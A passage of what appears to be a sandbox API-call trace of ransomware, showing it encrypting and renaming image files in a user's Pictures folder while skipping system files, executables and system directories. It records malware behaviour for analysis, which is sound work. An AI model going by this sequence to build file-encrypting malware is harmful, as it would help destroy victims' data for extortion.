HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\scbbhmeav.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.481] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=51031) returned 1 [0086.481] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.481] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.481] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.481] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.481] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.481] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.482] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.483] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.483] CloseHandle (hObject=0x42c) returned 1 [0086.483] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.483] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.484] CloseHandle (hObject=0x0) returned 0 [0086.484] CloseHandle (hObject=0x428) returned 1 [0086.485] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.485] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.485] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.485] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif") returned 58 [0086.485] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif.8PDnT") returned 64 [0086.485] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\scbbhmeav.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif.8PDnT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\scbbhmeav.gif.8pdnt"), dwFlags=0x0) returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="DECRYPT-FILES.txt") returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="autorun.inf") returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="boot.ini") returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="desktop.ini") returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="ntuser.dat") returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="iconcache.db") returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="bootsect.bak") returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="ntuser.dat.log") returned 1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="thumbs.db") returned -1 [0086.486] lstrcmpiW (lpString1="SHZ406jI.jpg", lpString2="Bootfont.bin") returned 1 [0086.486] lstrlenW (lpString="SHZ406jI.jpg") returned 12 [0086.486] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.486] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.486] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.486] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.486] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.486] lstrlenW (lpString="SHZ406jI.jpg") returned 12 [0086.486] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.486] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="SHZ406jI.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg" [0086.487] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.487] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.487] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.488] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.488] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.488] CloseHandle (hObject=0x0) returned 0 [0086.488] CloseHandle (hObject=0x428) returned 1 [0086.489] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.489] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.489] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg") returned 57 [0086.489] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg.8PDnT") returned 63 [0086.489] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\shz406ji.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg.8PDnT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\shz406ji.jpg.8pdnt"), dwFlags=0x0) returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="DECRYPT-FILES.txt") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="autorun.inf") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="boot.ini") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="desktop.ini") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="ntuser.dat") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="iconcache.db") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="bootsect.bak") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="ntuser.dat.log") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="thumbs.db") returned 1 [0086.490] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png", lpString2="Bootfont.bin") returned 1 [0086.490] lstrlenW (lpString="upBbqKtvqsUVFBqU.png") returned 20 [0086.490] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0086.490] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0086.490] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0086.490] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0086.490] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.490] lstrlenW (lpString="upBbqKtvqsUVFBqU.png") returned 20 [0086.490] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.490] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="upBbqKtvqsUVFBqU.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png" [0086.490] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.490] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.491] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.492] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.492] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.493] CloseHandle (hObject=0x0) returned 0 [0086.493] CloseHandle (hObject=0x428) returned 1 [0086.493] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.493] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.493] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png") returned 65 [0086.493] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png.8PDnT") returned 71 [0086.493] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\upbbqktvqsuvfbqu.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png.8PDnT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\upbbqktvqsuvfbqu.png.8pdnt"), dwFlags=0x0) returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="DECRYPT-FILES.txt") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="autorun.inf") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="boot.ini") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="desktop.ini") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="ntuser.dat") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="iconcache.db") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="bootsect.bak") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="ntuser.dat.log") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="thumbs.db") returned 1 [0086.494] lstrcmpiW (lpString1="xS-NM.png", lpString2="Bootfont.bin") returned 1 [0086.494] lstrlenW (lpString="xS-NM.png") returned 9 [0086.494] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0086.494] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0086.494] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0086.494] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0086.494] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.494] lstrlenW (lpString="xS-NM.png") returned 9 [0086.495] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.495] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="xS-NM.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png" [0086.495] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.495] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.495] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.496] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.496] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.496] CloseHandle (hObject=0x0) returned 0 [0086.496] CloseHandle (hObject=0x428) returned 1 [0086.497] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.497] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.497] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png") returned 54 [0086.497] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png.8PDnT") returned 60 [0086.497] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\xs-nm.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png.8PDnT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\xs-nm.png.8pdnt"), dwFlags=0x0) returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="autorun.inf") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="boot.ini") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="desktop.ini") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="ntuser.dat") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="iconcache.db") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="bootsect.bak") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="ntuser.dat.log") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="thumbs.db") returned 1 [0086.532] lstrcmpiW (lpString1="YswvYHAlz U.bmp", lpString2="Bootfont.bin") returned 1 [0086.532] lstrlenW (lpString="YswvYHAlz U.bmp") returned 15 [0086.532] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.532] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.533] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.533] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.533] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.533] lstrlenW (lpString="YswvYHAlz U.bmp") returned 15 [0086.533] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.533] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="YswvYHAlz U.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp" [0086.533] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.533] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.533] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.534] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.535] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.535] CloseHandle (hObject=0x0) returned 0 [0086.535] CloseHandle (hObject=0x428) returned 1 [0086.536] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.536] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.536] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp") returned 60 [0086.536] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp.1ZY6CM6") returned 68 [0086.536] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\yswvyhalz u.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp.1ZY6CM6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\yswvyhalz u.bmp.1zy6cm6"), dwFlags=0x0) returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="DECRYPT-FILES.txt") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="autorun.inf") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="boot.ini") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="desktop.ini") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="ntuser.dat") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="iconcache.db") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="bootsect.bak") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="ntuser.dat.log") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="thumbs.db") returned 1 [0086.538] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg", lpString2="Bootfont.bin") returned 1 [0086.538] lstrlenW (lpString="YjxAnqh-TfT9kDkn.jpg") returned 20 [0086.538] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.538] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.538] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.538] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.538] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.538] lstrlenW (lpString="YjxAnqh-TfT9kDkn.jpg") returned 20 [0086.538] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0086.538] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="YjxAnqh-TfT9kDkn.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg" [0086.538] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.539] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.539] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0086.540] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.541] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0086.541] CloseHandle (hObject=0x0) returned 0 [0086.541] CloseHandle (hObject=0x410) returned 1 [0086.542] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.542] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg") returned 59 [0086.542] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg.1ZY6CM6") returned 67 [0086.542] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yjxanqh-tft9kdkn.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg.1ZY6CM6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yjxanqh-tft9kdkn.jpg.1zy6cm6"), dwFlags=0x0) returned 1 [0086.546] lstrcatW (in: lpString1="ZeLlJvzMNja", lpString2="\\" | out: lpString1="ZeLlJvzMNja\\") returned="ZeLlJvzMNja\\" [0086.546] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Program Files") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch=":\\Windows") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Games\\") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", 